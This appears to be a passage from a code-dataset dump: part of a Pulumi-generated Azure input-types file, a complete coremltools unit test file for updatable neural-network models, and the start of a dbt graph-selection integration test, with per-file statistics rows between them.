pulumi.set(__self__, "identity_ids", identity_ids)
if principal_id is not None:
pulumi.set(__self__, "principal_id", principal_id)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Specifies the type of Managed Service Identity that should be configured on this API Management Service. Possible values are `SystemAssigned`, `UserAssigned`, `SystemAssigned, UserAssigned` (to enable both).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="identityIds")
def identity_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of IDs for User Assigned Managed Identity resources to be assigned.
"""
return pulumi.get(self, "identity_ids")
@identity_ids.setter
def identity_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "identity_ids", value)
@property
@pulumi.getter(name="principalId")
def principal_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Principal (Client) in Azure Active Directory.
"""
return pulumi.get(self, "principal_id")
@principal_id.setter
def principal_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "principal_id", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Azure Active Directory Tenant.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class ConfigurationStorePrimaryReadKeyArgs:
def __init__(__self__, *,
connection_string: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
secret: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
:param pulumi.Input[str] id: The ID of the Access Key.
:param pulumi.Input[str] secret: The Secret of the Access Key.
"""
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if id is not None:
pulumi.set(__self__, "id", id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[pulumi.Input[str]]:
"""
The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Access Key.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The Secret of the Access Key.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStorePrimaryWriteKeyArgs:
def __init__(__self__, *,
connection_string: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
secret: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
:param pulumi.Input[str] id: The ID of the Access Key.
:param pulumi.Input[str] secret: The Secret of the Access Key.
"""
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if id is not None:
pulumi.set(__self__, "id", id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[pulumi.Input[str]]:
"""
The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Access Key.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The Secret of the Access Key.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStoreSecondaryReadKeyArgs:
def __init__(__self__, *,
connection_string: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
secret: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
:param pulumi.Input[str] id: The ID of the Access Key.
:param pulumi.Input[str] secret: The Secret of the Access Key.
"""
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if id is not None:
pulumi.set(__self__, "id", id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[pulumi.Input[str]]:
"""
The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Access Key.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The Secret of the Access Key.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ConfigurationStoreSecondaryWriteKeyArgs:
def __init__(__self__, *,
connection_string: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
secret: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] connection_string: The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
:param pulumi.Input[str] id: The ID of the Access Key.
:param pulumi.Input[str] secret: The Secret of the Access Key.
"""
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if id is not None:
pulumi.set(__self__, "id", id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[pulumi.Input[str]]:
"""
The Connection String for this Access Key - comprising of the Endpoint, ID and Secret.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Access Key.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The Secret of the Access Key.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
| 35.990291
| 246
| 0.632767
| 1,320
| 11,121
| 5.191667
| 0.083333
| 0.117175
| 0.130746
| 0.134831
| 0.847804
| 0.800671
| 0.782431
| 0.757478
| 0.748431
| 0.741865
| 0
| 0.00012
| 0.251956
| 11,121
| 308
| 247
| 36.107143
| 0.823657
| 0.241975
| 0
| 0.725806
| 1
| 0
| 0.087217
| 0.022918
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198925
| false
| 0
| 0.026882
| 0
| 0.33871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
810a30af53923464d3f05031b3d9a710c2d1b016
| 25,303
|
py
|
Python
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
src/external/coremltools_wrap/coremltools/coremltools/test/pipeline/test_model_updatable.py
|
cookingcodewithme/turicreate
|
a89e203d60529d2d72547c03ec9753ea979ee342
|
[
"BSD-3-Clause"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
# Copyright (c) 2017, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import os, shutil
import numpy as _np
import coremltools.models.datatypes as datatypes
import unittest
import pytest
import tempfile
from coremltools.models.utils import save_spec
from coremltools.models import MLModel
from coremltools.models.neural_network import (
NeuralNetworkBuilder,
AdamParams,
SgdParams,
)
from coremltools.models.pipeline import PipelineRegressor, PipelineClassifier
class MLModelUpdatableTest(unittest.TestCase):
@classmethod
def setUpClass(self):
self.model_dir = tempfile.mkdtemp()
@classmethod
def tearDownClass(self):
if os.path.exists(self.model_dir):
shutil.rmtree(self.model_dir)
def create_base_builder(self):
self.input_features = [("input", datatypes.Array(3))]
self.output_features = [("output", None)]
self.output_names = ["output"]
builder = NeuralNetworkBuilder(self.input_features, self.output_features)
W1 = _np.random.uniform(-0.5, 0.5, (3, 3))
W2 = _np.random.uniform(-0.5, 0.5, (3, 3))
builder.add_inner_product(
name="ip1",
W=W1,
b=None,
input_channels=3,
output_channels=3,
has_bias=False,
input_name="input",
output_name="hidden",
)
builder.add_inner_product(
name="ip2",
W=W2,
b=None,
input_channels=3,
output_channels=3,
has_bias=False,
input_name="hidden",
output_name="output",
)
builder.make_updatable(["ip1", "ip2"]) # or a dict for weightParams
return builder
def test_updatable_model_creation_ce_sgd(self):
builder = self.create_base_builder()
builder.add_softmax(
name="softmax", input_name="output", output_name="softmax_output"
)
builder.set_categorical_cross_entropy_loss(
name="cross_entropy", input="softmax_output"
)
builder.set_sgd_optimizer(SgdParams(lr=1e-2, batch=10, momentum=0.0))
builder.set_epochs(20, allowed_set=[10, 20, 30, 40])
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertTrue(spec.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].innerProduct.weights.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].innerProduct.weights.isUpdatable)
self.assertTrue(
spec.neuralNetwork.updateParams.lossLayers[
0
].categoricalCrossEntropyLossLayer
is not None
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer is not None
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.defaultValue,
1e-2,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.miniBatchSize.defaultValue,
10,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.defaultValue,
0,
atol=1e-8,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.epochs.defaultValue, 20, atol=1e-4
)
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.miniBatchSize.set.values
== [10]
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.range.maxValue
== 1
)
def test_updatable_model_creation_ce_adam(self):
builder = self.create_base_builder()
builder.add_softmax(
name="softmax", input_name="output", output_name="softmax_output"
)
builder.set_categorical_cross_entropy_loss(
name="cross_entropy", input="softmax_output"
)
adam_params = AdamParams()
adam_params.set_batch(value=10, allowed_set=[10, 20])
builder.set_adam_optimizer(adam_params)
builder.set_epochs(20)
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertTrue(spec.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].innerProduct.weights.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].innerProduct.weights.isUpdatable)
self.assertTrue(
spec.neuralNetwork.updateParams.lossLayers[
0
].categoricalCrossEntropyLossLayer
is not None
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer is not None
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.defaultValue,
1e-2,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.miniBatchSize.defaultValue,
10,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.defaultValue,
0.9,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.defaultValue,
0.999,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.defaultValue,
1e-8,
atol=1e-8,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.epochs.defaultValue, 20, atol=1e-4
)
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.miniBatchSize.set.values
== [10, 20]
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.range.maxValue
== 1
)
self.assertTrue(spec.neuralNetwork.updateParams.epochs.set.values == [20])
def test_updatable_model_creation_mse_sgd(self):
builder = self.create_base_builder()
builder.set_mean_squared_error_loss(
name="mse", input_feature=("output", datatypes.Array(3))
)
builder.set_sgd_optimizer(SgdParams(lr=1e-2, batch=10, momentum=0.0))
builder.set_epochs(20)
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertTrue(spec.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].innerProduct.weights.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].innerProduct.weights.isUpdatable)
self.assertTrue(
spec.neuralNetwork.updateParams.lossLayers[
0
].categoricalCrossEntropyLossLayer
is not None
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer is not None
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.defaultValue,
1e-2,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.miniBatchSize.defaultValue,
10,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.defaultValue,
0,
atol=1e-8,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.epochs.defaultValue, 20, atol=1e-4
)
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.learningRate.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.miniBatchSize.set.values
== [10]
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.sgdOptimizer.momentum.range.maxValue
== 1
)
def test_updatable_model_creation_mse_adam(self):
builder = self.create_base_builder()
builder.set_mean_squared_error_loss(
name="mse", input_feature=("output", datatypes.Array(3))
)
builder.set_adam_optimizer(
AdamParams(lr=1e-2, batch=10, beta1=0.9, beta2=0.999, eps=1e-8)
)
builder.set_epochs(20, allowed_set=[10, 20, 30])
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertTrue(spec.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[0].innerProduct.weights.isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].isUpdatable)
self.assertTrue(spec.neuralNetwork.layers[1].innerProduct.weights.isUpdatable)
self.assertTrue(
spec.neuralNetwork.updateParams.lossLayers[
0
].categoricalCrossEntropyLossLayer
is not None
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer is not None
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.defaultValue,
1e-2,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.miniBatchSize.defaultValue,
10,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.defaultValue,
0.9,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.defaultValue,
0.999,
atol=1e-4,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.defaultValue,
1e-8,
atol=1e-8,
)
)
self.assertTrue(
_np.isclose(
spec.neuralNetwork.updateParams.epochs.defaultValue, 20, atol=1e-4
)
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.learningRate.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.miniBatchSize.set.values
== [10]
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta1.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.beta2.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.range.minValue
== 0
)
self.assertTrue(
spec.neuralNetwork.updateParams.optimizer.adamOptimizer.eps.range.maxValue
== 1
)
self.assertTrue(
spec.neuralNetwork.updateParams.epochs.set.values == [10, 20, 30]
)
def test_nn_set_cce_without_softmax_fail(self):
nn_builder = self.create_base_builder()
# fails since adding CCE without softmax must raise error
with self.assertRaises(ValueError):
nn_builder.set_categorical_cross_entropy_loss(
name="cross_entropy", input="output"
)
def test_nn_set_cce_invalid(self):
nn_builder = self.create_base_builder()
nn_builder.add_softmax(
name="softmax", input_name="output", output_name="softmax_output"
)
# fails since CCE input must be softmax output
with self.assertRaises(ValueError):
nn_builder.set_categorical_cross_entropy_loss(
name="cross_entropy", input="output"
)
def test_nn_set_softmax_updatable_invalid(self):
nn_builder = self.create_base_builder()
nn_builder.add_softmax(
name="softmax", input_name="output", output_name="softmax_output"
)
# fails since marking softmax as updatable layer is not allowed
with self.assertRaises(ValueError):
nn_builder.make_updatable(["softmax"])
def test_nn_set_training_input(self):
builder = self.create_base_builder()
builder.set_mean_squared_error_loss(
name="mse", input_feature=("output", datatypes.Array(3))
)
builder.set_adam_optimizer(
AdamParams(lr=1e-2, batch=10, beta1=0.9, beta2=0.999, eps=1e-8)
)
builder.set_epochs(20, allowed_set=[10, 20, 30])
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertEqual(spec.description.trainingInput[0].name, "input")
self.assertEqual(
spec.description.trainingInput[0].type.WhichOneof("Type"), "multiArrayType"
)
self.assertEqual(spec.description.trainingInput[1].name, "output_true")
self.assertEqual(
spec.description.trainingInput[1].type.WhichOneof("Type"), "multiArrayType"
)
def test_nn_builder_with_training_features(self):
input_features = [("input", datatypes.Array(3))]
output_features = [("output", datatypes.Array(3))]
builder = NeuralNetworkBuilder(input_features, output_features)
W1 = _np.random.uniform(-0.5, 0.5, (3, 3))
W2 = _np.random.uniform(-0.5, 0.5, (3, 3))
builder.add_inner_product(
name="ip1",
W=W1,
b=None,
input_channels=3,
output_channels=3,
has_bias=False,
input_name="input",
output_name="hidden",
)
builder.add_inner_product(
name="ip2",
W=W2,
b=None,
input_channels=3,
output_channels=3,
has_bias=False,
input_name="hidden",
output_name="output",
)
builder.make_updatable(["ip1", "ip2"]) # or a dict for weightParams
builder.set_mean_squared_error_loss(
name="mse", input_feature=("output", datatypes.Array(3))
)
builder.set_adam_optimizer(
AdamParams(lr=1e-2, batch=10, beta1=0.9, beta2=0.999, eps=1e-8)
)
builder.set_epochs(20, allowed_set=[10, 20, 30])
model_path = os.path.join(self.model_dir, "updatable_creation.mlmodel")
print(model_path)
save_spec(builder.spec, model_path)
mlmodel = MLModel(model_path)
self.assertTrue(mlmodel is not None)
spec = mlmodel.get_spec()
self.assertEqual(spec.description.trainingInput[0].name, "input")
self.assertEqual(
spec.description.trainingInput[0].type.WhichOneof("Type"), "multiArrayType"
)
self.assertEqual(spec.description.trainingInput[1].name, "output_true")
self.assertEqual(
spec.description.trainingInput[1].type.WhichOneof("Type"), "multiArrayType"
)
def test_pipeline_regressor_make_updatable(self):
builder = self.create_base_builder()
builder.spec.isUpdatable = False
training_input = [("input", datatypes.Array(3)), ("target", "Double")]
# fails due to missing sub-models
p_regressor = PipelineRegressor(
self.input_features, self.output_names, training_input
)
with self.assertRaises(ValueError):
p_regressor.make_updatable()
self.assertEqual(p_regressor.spec.isUpdatable, False)
# fails due to sub-model being not updatable
p_regressor.add_model(builder.spec)
with self.assertRaises(ValueError):
p_regressor.make_updatable()
self.assertEqual(p_regressor.spec.isUpdatable, False)
builder.spec.isUpdatable = True
p_regressor.add_model(builder.spec)
self.assertEqual(p_regressor.spec.isUpdatable, False)
p_regressor.make_updatable()
self.assertEqual(p_regressor.spec.isUpdatable, True)
self.assertEqual(p_regressor.spec.description.trainingInput[0].name, "input")
self.assertEqual(
p_regressor.spec.description.trainingInput[0].type.WhichOneof("Type"),
"multiArrayType",
)
self.assertEqual(p_regressor.spec.description.trainingInput[1].name, "target")
self.assertEqual(
p_regressor.spec.description.trainingInput[1].type.WhichOneof("Type"),
"doubleType",
)
# fails since once updatable does not allow adding new models
with self.assertRaises(ValueError):
p_regressor.add_model(builder.spec)
self.assertEqual(p_regressor.spec.isUpdatable, True)
def test_pipeline_classifier_make_updatable(self):
builder = self.create_base_builder()
builder.spec.isUpdatable = False
training_input = [("input", datatypes.Array(3)), ("target", "String")]
# fails due to missing sub-models
p_classifier = PipelineClassifier(
self.input_features, self.output_names, training_features=training_input
)
with self.assertRaises(ValueError):
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, False)
# fails due to sub-model being not updatable
p_classifier.add_model(builder.spec)
with self.assertRaises(ValueError):
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, False)
builder.spec.isUpdatable = True
p_classifier.add_model(builder.spec)
self.assertEqual(p_classifier.spec.isUpdatable, False)
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, True)
self.assertEqual(p_classifier.spec.description.trainingInput[0].name, "input")
self.assertEqual(
p_classifier.spec.description.trainingInput[0].type.WhichOneof("Type"),
"multiArrayType",
)
self.assertEqual(p_classifier.spec.description.trainingInput[1].name, "target")
self.assertEqual(
p_classifier.spec.description.trainingInput[1].type.WhichOneof("Type"),
"stringType",
)
# fails since once updatable does not allow adding new models
with self.assertRaises(ValueError):
p_classifier.add_model(builder.spec)
self.assertEqual(p_classifier.spec.isUpdatable, True)
def test_pipeline_classifier_set_training_inputs(self):
builder = self.create_base_builder()
builder.spec.isUpdatable = False
training_input = [("input", datatypes.Array(3)), ("target", "String")]
# fails due to missing sub-models
p_classifier = PipelineClassifier(self.input_features, self.output_names)
p_classifier.set_training_input(training_input)
with self.assertRaises(ValueError):
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, False)
# fails due to sub-model being not updatable
p_classifier.add_model(builder.spec)
with self.assertRaises(ValueError):
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, False)
builder.spec.isUpdatable = True
p_classifier.add_model(builder.spec)
self.assertEqual(p_classifier.spec.isUpdatable, False)
p_classifier.make_updatable()
self.assertEqual(p_classifier.spec.isUpdatable, True)
self.assertEqual(p_classifier.spec.description.trainingInput[0].name, "input")
self.assertEqual(
p_classifier.spec.description.trainingInput[0].type.WhichOneof("Type"),
"multiArrayType",
)
self.assertEqual(p_classifier.spec.description.trainingInput[1].name, "target")
self.assertEqual(
p_classifier.spec.description.trainingInput[1].type.WhichOneof("Type"),
"stringType",
)
# fails since once updatable does not allow adding new models
with self.assertRaises(ValueError):
p_classifier.add_model(builder.spec)
self.assertEqual(p_classifier.spec.isUpdatable, True)
def test_shuffle_on_by_default(self):
builder = self.create_base_builder()
# base builder already marks two layers as updatable
self.assertTrue(
builder.nn_spec.updateParams.shuffle.defaultValue,
"Shuffle not turned on by default for updatable models",
)
| 34.804677
| 99
| 0.616844
| 2,517
| 25,303
| 6.048868
| 0.087008
| 0.078161
| 0.068571
| 0.109951
| 0.905681
| 0.901281
| 0.89156
| 0.874351
| 0.866404
| 0.856946
| 0
| 0.018774
| 0.288464
| 25,303
| 726
| 100
| 34.852617
| 0.826872
| 0.034739
| 0
| 0.710311
| 0
| 0
| 0.034175
| 0.006392
| 0
| 0
| 0
| 0
| 0.216039
| 1
| 0.026187
| false
| 0
| 0.016367
| 0
| 0.045827
| 0.00982
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8122f609da7d662364ad17a4c215d8edb379b3b0
| 13,420
|
py
|
Python
|
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
test/integration/007_graph_selection_tests/test_graph_selection.py
|
jankytara2/dbt
|
3f4069ab6d4d5b3fc34f8fe785761b5617357b0f
|
[
"Apache-2.0"
] | null | null | null |
from test.integration.base import DBTIntegrationTest, use_profile
import yaml
import json
import os
class TestGraphSelection(DBTIntegrationTest):
@property
def schema(self):
return "graph_selection_tests_007"
@property
def models(self):
return "models"
@property
def selectors_config(self):
return yaml.safe_load('''
selectors:
- name: bi_selector
description: This is a BI selector
definition:
method: tag
value: bi
''')
def assert_correct_schemas(self):
with self.get_connection():
exists = self.adapter.check_schema_exists(
self.default_database,
self.unique_schema()
)
self.assertTrue(exists)
schema = self.unique_schema()+'_and_then'
exists = self.adapter.check_schema_exists(
self.default_database,
schema
)
self.assertFalse(exists)
@use_profile('postgres')
def test__postgres__specific_model(self):
self.run_sql_file("seed.sql")
results = self.run_dbt(['run', '--select', 'users'])
self.assertEqual(len(results), 1)
self.assertTablesEqual("seed", "users")
created_models = self.get_models_in_schema()
self.assertFalse('users_rollup' in created_models)
self.assertFalse('alternative.users' in created_models)
self.assertFalse('base_users' in created_models)
self.assertFalse('emails' in created_models)
self.assert_correct_schemas()
@use_profile('postgres')
